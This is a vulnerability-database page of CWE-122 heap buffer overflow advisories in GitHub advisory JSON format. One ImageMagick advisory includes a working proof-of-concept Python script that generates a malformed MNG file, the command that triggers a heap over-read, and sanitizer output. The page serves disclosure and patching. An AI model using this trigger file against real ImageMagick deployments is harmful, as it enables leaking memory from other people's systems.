Common Weakness Enumeration

CWE-122

Allowed

Heap-based Buffer Overflow

Abstraction: Variant · Status: Draft

A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc().

4106 vulnerabilities reference this CWE, most recent first.

GHSA-CJ7M-V38W-W8VQ

Vulnerability from github – Published: 2026-06-02 00:31 – Updated: 2026-06-02 00:31
VLAI
Details

In Load of LoadedArsc.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-0100"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-01T22:16:23Z",
    "severity": "HIGH"
  },
  "details": "In Load of LoadedArsc.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.",
  "id": "GHSA-cj7m-v38w-w8vq",
  "modified": "2026-06-02T00:31:57Z",
  "published": "2026-06-02T00:31:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0100"
    },
    {
      "type": "WEB",
      "url": "https://source.android.com/docs/security/bulletin/2026/2026-06-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CJ93-Q2W3-FJXC

Vulnerability from github – Published: 2022-02-12 00:01 – Updated: 2025-11-03 21:30
VLAI
Details

Heap-based Buffer Overflow in Conda vim prior to 8.2.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-0417"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122",
      "CWE-787"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-02-01T13:15:00Z",
    "severity": "HIGH"
  },
  "details": "Heap-based Buffer Overflow in Conda vim prior to 8.2.",
  "id": "GHSA-cj93-q2w3-fjxc",
  "modified": "2025-11-03T21:30:37Z",
  "published": "2022-02-12T00:01:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0417"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vim/vim/commit/652dee448618589de5528a9e9a36995803f5557a"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/fc86bc8d-c866-4ade-8b7f-e49cec306d1a"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/06/msg00014.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00009.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00023.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7ZLEHVP4LNAGER4ZDGUDS5V5YVQD6INF"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UFXFAILMLUIK4MBUEZO4HNBNKYZRJ5AP"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7ZLEHVP4LNAGER4ZDGUDS5V5YVQD6INF"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFXFAILMLUIK4MBUEZO4HNBNKYZRJ5AP"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202208-32"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CJC4-92CQ-3RH3

Vulnerability from github – Published: 2024-06-11 18:30 – Updated: 2024-06-11 18:30
VLAI
Details

Win32k Elevation of Privilege Vulnerability

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-30091"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-11T17:15:57Z",
    "severity": "HIGH"
  },
  "details": "Win32k Elevation of Privilege Vulnerability",
  "id": "GHSA-cjc4-92cq-3rh3",
  "modified": "2024-06-11T18:30:49Z",
  "published": "2024-06-11T18:30:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30091"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30091"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CJC8-G9W8-CHFW

Vulnerability from github – Published: 2025-08-25 15:58 – Updated: 2025-08-25 15:58
VLAI
Summary
imagemagick: heap-buffer overflow read in MNG magnification with alpha
Details

Vulnerability Details

When performing image magnification in ReadOneMNGIMage (in coders/png.c), there is an issue around the handling of images with separate alpha channels.

When loading an image with a color type that implies a separate alpha channel (ie. jng_color_type >= 12), we will load the alpha pixels in this loop:

     if (logging != MagickFalse)
        (void) LogMagickEvent(CoderEvent,GetMagickModule(),
          "    Reading alpha from alpha_blob.");
      jng_image=ReadImage(alpha_image_info,exception);

      if (jng_image != (Image *) NULL)
        for (y=0; y < (ssize_t) image->rows; y++)
        {
          s=GetVirtualPixels(jng_image,0,y,image->columns,1,exception);
          q=GetAuthenticPixels(image,0,y,image->columns,1,exception); // [0]
          if ((s == (const Quantum *)  NULL) || (q == (Quantum *) NULL))
            break;

          if (image->alpha_trait != UndefinedPixelTrait)
            for (x=(ssize_t) image->columns; x != 0; x--)
            {
              SetPixelAlpha(image,GetPixelRed(jng_image,s),q);
              q+=(ptrdiff_t) GetPixelChannels(image);
              s+=(ptrdiff_t) GetPixelChannels(jng_image);
            }

          else
            for (x=(ssize_t) image->columns; x != 0; x--)
            {
              Quantum
                alpha;

              alpha=GetPixelRed(jng_image,s);
              SetPixelAlpha(image,alpha,q);
              if (alpha != OpaqueAlpha)
                image->alpha_trait=BlendPixelTrait; // [1]
              q+=(ptrdiff_t) GetPixelChannels(image);
              s+=(ptrdiff_t) GetPixelChannels(jng_image);
            }

          if (SyncAuthenticPixels(image,exception) == MagickFalse)
            break;
        }

Note that at [1] we update image->alpha_trait, but if our alpha image only contains non-opaque pixels in the last row, we do not call GetAuthenticPixels (at [0]) after this change has been made.

The next call to GetAuthenticPixels will then call down into ResetPixelChannelMap which adds the new alpha channel to the image channel mappings and metadata.

If we then pass this image into the MAGN chunk type, we can see that at [2] we calculate the sizes for intermediate buffers next and prev, before calling GetAuthenticPixels at [4].

After the call at [4], the image->num_channels has increased to include the new alpha channel, and now length and the previously allocated next and prev buffers are too small. Fortunately length is always used when copying into the buffers, but when reading pixels from the buffers, we call GetPixelXXX which assumes the layout of the current image, which requires a larger allocation.

The pixel copying loop will subsequently read beyond the end of the allocation at [5].

               /* magnify the rows into the right side of the large image */

                if (logging != MagickFalse)
                  (void) LogMagickEvent(CoderEvent,GetMagickModule(),
                    "    Magnify the rows to %.20g",
                    (double) large_image->rows);
                m=(ssize_t) mng_info->magn_mt;
                yy=0;
                length=(size_t) GetPixelChannels(image)*image->columns; // [2]
                next=(Quantum *) AcquireQuantumMemory(length,sizeof(*next));
                prev=(Quantum *) AcquireQuantumMemory(length,sizeof(*prev));

                if ((prev == (Quantum *) NULL) ||
                    (next == (Quantum *) NULL))
                  {
                    if (prev != (Quantum *) NULL)
                      prev=(Quantum *) RelinquishMagickMemory(prev);
                    if (next != (Quantum *) NULL)
                      next=(Quantum *) RelinquishMagickMemory(next);
                    image=DestroyImageList(image);
                    ThrowReaderException(ResourceLimitError,
                      "MemoryAllocationFailed");
                  }

                n=GetAuthenticPixels(image,0,0,image->columns,1,exception); // [4]
                (void) memcpy(next,n,length);

                for (y=0; y < (ssize_t) image->rows; y++)
                {
                  if (y == 0)
                    m=(ssize_t) mng_info->magn_mt;

                  else if (magn_methy > 1 && y == (ssize_t) image->rows-2)
                    m=(ssize_t) mng_info->magn_mb;

                  else if (magn_methy <= 1 && y == (ssize_t) image->rows-1)
                    m=(ssize_t) mng_info->magn_mb;

                  else if (magn_methy > 1 && y == (ssize_t) image->rows-1)
                    m=1;

                  else
                    m=(ssize_t) mng_info->magn_my;

                  n=prev;
                  prev=next;
                  next=n;

                  if (y < (ssize_t) image->rows-1)
                    {
                      n=GetAuthenticPixels(image,0,y+1,image->columns,1,
                          exception);
                      (void) memcpy(next,n,length);
                    }

                  for (i=0; i < m; i++, yy++)
                  {
                    Quantum
                      *pixels;

                    assert(yy < (ssize_t) large_image->rows);
                    pixels=prev;
                    n=next;
                    q=GetAuthenticPixels(large_image,0,yy,large_image->columns,
                      1,exception);
                    if (q == (Quantum *) NULL)
                      break;
                    q+=(ptrdiff_t) (large_image->columns-image->columns)*
                      GetPixelChannels(large_image);

                    for (x=(ssize_t) image->columns-1; x >= 0; x--)
                    {
                      /* To do: get color as function of indexes[x] */
                      /*
                      if (image->storage_class == PseudoClass)
                        {
                        }
                      */

                      if (magn_methy <= 1)
                        {
                          /* replicate previous */
                          SetPixelRed(large_image,GetPixelRed(image,pixels),q);  // [5]
                          SetPixelGreen(large_image,GetPixelGreen(image,
                             pixels),q);
                          SetPixelBlue(large_image,GetPixelBlue(image,
                             pixels),q);
                          SetPixelAlpha(large_image,GetPixelAlpha(image,
                             pixels),q);
                        }

This can likely be used to leak subsequent memory contents into the output image.

The attached proof-of-concept triggers this issue and is not blocked by any of the default security policies.

Affected Version(s)

The issue has been successfully reproduced:

  • at commit 3e37a7f15fcb1aa80e6beae3898e684309c2ecbe

  • in stable release 7.1.2-0

Build Instructions

git clone https://github.com/imagemagick/imagemagick

cd imagemagick

export CC=clang
export CXX=clang++
export CFLAGS="-fsanitize=address -O0 -ggdb"
export CXXFLAGS="-fsanitize=address -O0 -ggdb"
export LDFLAGS="-fsanitize=address -O0 -ggdb"

./configure --disable-shared --disable-docs --with-jxl
make -j

Reproduction

Test Case

This testcase is a python script that will generate an MNG file which can be used to trigger the vulnerability.

import struct
import zlib

def chunk(tag, data):
    crc = zlib.crc32(tag + data) & 0xffffffff
    return struct.pack('>I', len(data)) + tag + data + struct.pack('>I', crc)

# Simple 128x1 RGB jpeg
jpeg = bytes([
  0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46, 0x00, 0x01,
  0x01, 0x01, 0x01, 0x2c, 0x01, 0x2c, 0x00, 0x00, 0xff, 0xdb, 0x00, 0x43,
  0x00, 0x03, 0x02, 0x02, 0x03, 0x02, 0x02, 0x03, 0x03, 0x03, 0x03, 0x04,
  0x03, 0x03, 0x04, 0x05, 0x08, 0x05, 0x05, 0x04, 0x04, 0x05, 0x0a, 0x07,
  0x07, 0x06, 0x08, 0x0c, 0x0a, 0x0c, 0x0c, 0x0b, 0x0a, 0x0b, 0x0b, 0x0d,
  0x0e, 0x12, 0x10, 0x0d, 0x0e, 0x11, 0x0e, 0x0b, 0x0b, 0x10, 0x16, 0x10,
  0x11, 0x13, 0x14, 0x15, 0x15, 0x15, 0x0c, 0x0f, 0x17, 0x18, 0x16, 0x14,
  0x18, 0x12, 0x14, 0x15, 0x14, 0xff, 0xdb, 0x00, 0x43, 0x01, 0x03, 0x04,
  0x04, 0x05, 0x04, 0x05, 0x09, 0x05, 0x05, 0x09, 0x14, 0x0d, 0x0b, 0x0d,
  0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14,
  0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14,
  0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14,
  0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14,
  0x14, 0x14, 0xff, 0xc0, 0x00, 0x11, 0x08, 0x00, 0x01, 0x00, 0x80, 0x03,
  0x01, 0x11, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, 0xff, 0xc4, 0x00,
  0x15, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0xff, 0xc4, 0x00, 0x14,
  0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xc4, 0x00, 0x14, 0x01, 0x01,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0xff, 0xc4, 0x00, 0x14, 0x11, 0x01, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0xff, 0xda, 0x00, 0x0c, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03,
  0x11, 0x00, 0x3f, 0x00, 0xaa, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x3f, 0xff, 0xd9
])

# MNG File Construction
mng_sig = b'\x8aMNG\r\n\x1a\n'
mhdr_data = struct.pack('>IIIIIII', 1, 1, 1, 0, 0, 0, 0)
mhdr_chunk = chunk(b'MHDR', mhdr_data)
magn_data = struct.pack('>HH B H H H H H H B', 0, 0, 1, 2, 2, 2, 2, 2, 2, 1)
magn_chunk = chunk(b'MAGN', magn_data)
jhdr_data = struct.pack('>IIBBBBBBBB', 128, 1, 12, 8, 8, 0, 8, 0, 0, 0)
jhdr_chunk = chunk(b'JHDR', jhdr_data)
jdat_chunk = chunk(b'JDAT', jpeg)
scanlines = b'\x00\x00'*128
compressed_scanlines = zlib.compress(scanlines)
idat_chunk = chunk(b'IDAT', compressed_scanlines)
iend_chunk = chunk(b'IEND', b'')
mend_chunk = chunk(b'MEND', b'')
mng_bytes = mng_sig + mhdr_chunk + magn_chunk + jhdr_chunk + jdat_chunk + idat_chunk + iend_chunk + mend_chunk

with open("magn_read.mng", "wb") as tmp:
    tmp.write(mng_bytes)

Command

python3 ./generate_testcase.py
utilities/magick ./magn_read.mng -resize 200x200 PNG:output.png

ASan Backtrace

=================================================================
==1562409==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x51b000000680 at pc 0x557a486b0c64 bp 0x7ffe63210de0 sp 0x7ffe63210dd8
READ of size 4 at 0x51b000000680 thread T0
    #0 0x557a486b0c63 in GetPixelRed /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:405:10
    #1 0x557a4869ce03 in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6657:51
    #2 0x557a48683c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9
    #3 0x557a487a8f41 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15
    #4 0x557a487abf36 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9
    #5 0x557a48d747a8 in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4961:22
    #6 0x557a48d6862c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5475:7
    #7 0x557a48c3e3fb in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13
    #8 0x557a48c3f7c9 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5
    #9 0x557a48c3c13c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14
    #10 0x557a482847b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10
    #11 0x557a482841e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10
    #12 0x7f1431833ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #13 0x7f1431833d64 in __libc_start_main csu/../csu/libc-start.c:360:3
    #14 0x557a481a0790 in _start (/tmp/repro/imagemagick/utilities/magick+0x1f3790) (BuildId: c19eeda184f03d027903a515c023bed30e652cc3)

0x51b000000680 is located 0 bytes after 1536-byte region [0x51b000000080,0x51b000000680)
allocated by thread T0 here:
    #0 0x557a482405c3 in malloc (/tmp/repro/imagemagick/utilities/magick+0x2935c3) (BuildId: c19eeda184f03d027903a515c023bed30e652cc3)
    #1 0x557a482b9b6a in AcquireMagickMemory /tmp/repro/imagemagick/MagickCore/memory.c:559:10
    #2 0x557a482b9dba in AcquireQuantumMemory /tmp/repro/imagemagick/MagickCore/memory.c:677:10
    #3 0x557a4869c58c in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6584:34
    #4 0x557a48683c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9
    #5 0x557a487a8f41 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15
    #6 0x557a487abf36 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9
    #7 0x557a48d747a8 in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4961:22
    #8 0x557a48d6862c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5475:7
    #9 0x557a48c3e3fb in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13
    #10 0x557a48c3f7c9 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5
    #11 0x557a48c3c13c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14
    #12 0x557a482847b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10
    #13 0x557a482841e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10
    #14 0x7f1431833ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:405:10 in GetPixelRed
Shadow bytes around the buggy address:
  0x51b000000400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51b000000480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51b000000500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51b000000580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51b000000600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x51b000000680:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x51b000000700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x51b000000780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51b000000800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51b000000880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51b000000900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==1562409==ABORTING

Reporter Credit

Google Big Sleep

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-AnyCPU"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-AnyCPU"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-OpenMP-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-OpenMP-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-x86"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-OpenMP-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-OpenMP-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-x86"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-AnyCPU"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-OpenMP-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-OpenMP-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-x86"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "14.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-55004"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-122"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-25T15:58:40Z",
    "nvd_published_at": "2025-08-13T14:15:32Z",
    "severity": "HIGH"
  },
  "details": "## **Vulnerability Details**\n\nWhen performing image magnification in `ReadOneMNGIMage` (in `coders/png.c`), there is an issue around the handling of images with separate alpha channels.\n\nWhen loading an image with a color type that implies a separate alpha channel (ie. `jng_color_type \u003e= 12`), we will load the alpha pixels in this loop:\n\n```c\n     if (logging != MagickFalse)\n        (void) LogMagickEvent(CoderEvent,GetMagickModule(),\n          \"    Reading alpha from alpha_blob.\");\n      jng_image=ReadImage(alpha_image_info,exception);\n\n      if (jng_image != (Image *) NULL)\n        for (y=0; y \u003c (ssize_t) image-\u003erows; y++)\n        {\n          s=GetVirtualPixels(jng_image,0,y,image-\u003ecolumns,1,exception);\n          q=GetAuthenticPixels(image,0,y,image-\u003ecolumns,1,exception); // [0]\n          if ((s == (const Quantum *)  NULL) || (q == (Quantum *) NULL))\n            break;\n\n          if (image-\u003ealpha_trait != UndefinedPixelTrait)\n            for (x=(ssize_t) image-\u003ecolumns; x != 0; x--)\n            {\n              SetPixelAlpha(image,GetPixelRed(jng_image,s),q);\n              q+=(ptrdiff_t) GetPixelChannels(image);\n              s+=(ptrdiff_t) GetPixelChannels(jng_image);\n            }\n\n          else\n            for (x=(ssize_t) image-\u003ecolumns; x != 0; x--)\n            {\n              Quantum\n                alpha;\n\n              alpha=GetPixelRed(jng_image,s);\n              SetPixelAlpha(image,alpha,q);\n              if (alpha != OpaqueAlpha)\n                image-\u003ealpha_trait=BlendPixelTrait; // [1]\n              q+=(ptrdiff_t) GetPixelChannels(image);\n              s+=(ptrdiff_t) GetPixelChannels(jng_image);\n            }\n\n          if (SyncAuthenticPixels(image,exception) == MagickFalse)\n            break;\n        }\n```\n\nNote that at \\[1\\] we update `image-\u003ealpha_trait`, but if our alpha image only contains non-opaque pixels in the last row, we do not call `GetAuthenticPixels` (at \\[0\\]) after this change has been made. \n\nThe next call to `GetAuthenticPixels` will then call down into `ResetPixelChannelMap` which adds the new alpha channel to the image channel mappings and metadata.\n\nIf we then pass this image into the `MAGN` chunk type, we can see that at \\[2\\] we calculate the sizes for intermediate buffers `next` and `prev`, before calling `GetAuthenticPixels` at \\[4\\]. \n\nAfter the call at \\[4\\], the `image-\u003enum_channels` has increased to include the new alpha channel, and now `length` and the previously allocated `next` and `prev` buffers are too small. Fortunately `length` is always used when copying into the buffers, but when reading pixels from the buffers, we call `GetPixelXXX` which assumes the layout of the current image, which requires a larger allocation. \n\nThe pixel copying loop will subsequently read beyond the end of the allocation at \\[5\\].\n\n```c\n               /* magnify the rows into the right side of the large image */\n\n                if (logging != MagickFalse)\n                  (void) LogMagickEvent(CoderEvent,GetMagickModule(),\n                    \"    Magnify the rows to %.20g\",\n                    (double) large_image-\u003erows);\n                m=(ssize_t) mng_info-\u003emagn_mt;\n                yy=0;\n                length=(size_t) GetPixelChannels(image)*image-\u003ecolumns; // [2]\n                next=(Quantum *) AcquireQuantumMemory(length,sizeof(*next));\n                prev=(Quantum *) AcquireQuantumMemory(length,sizeof(*prev));\n\n                if ((prev == (Quantum *) NULL) ||\n                    (next == (Quantum *) NULL))\n                  {\n                    if (prev != (Quantum *) NULL)\n                      prev=(Quantum *) RelinquishMagickMemory(prev);\n                    if (next != (Quantum *) NULL)\n                      next=(Quantum *) RelinquishMagickMemory(next);\n                    image=DestroyImageList(image);\n                    ThrowReaderException(ResourceLimitError,\n                      \"MemoryAllocationFailed\");\n                  }\n\n                n=GetAuthenticPixels(image,0,0,image-\u003ecolumns,1,exception); // [4]\n                (void) memcpy(next,n,length);\n\n                for (y=0; y \u003c (ssize_t) image-\u003erows; y++)\n                {\n                  if (y == 0)\n                    m=(ssize_t) mng_info-\u003emagn_mt;\n\n                  else if (magn_methy \u003e 1 \u0026\u0026 y == (ssize_t) image-\u003erows-2)\n                    m=(ssize_t) mng_info-\u003emagn_mb;\n\n                  else if (magn_methy \u003c= 1 \u0026\u0026 y == (ssize_t) image-\u003erows-1)\n                    m=(ssize_t) mng_info-\u003emagn_mb;\n\n                  else if (magn_methy \u003e 1 \u0026\u0026 y == (ssize_t) image-\u003erows-1)\n                    m=1;\n\n                  else\n                    m=(ssize_t) mng_info-\u003emagn_my;\n\n                  n=prev;\n                  prev=next;\n                  next=n;\n\n                  if (y \u003c (ssize_t) image-\u003erows-1)\n                    {\n                      n=GetAuthenticPixels(image,0,y+1,image-\u003ecolumns,1,\n                          exception);\n                      (void) memcpy(next,n,length);\n                    }\n\n                  for (i=0; i \u003c m; i++, yy++)\n                  {\n                    Quantum\n                      *pixels;\n\n                    assert(yy \u003c (ssize_t) large_image-\u003erows);\n                    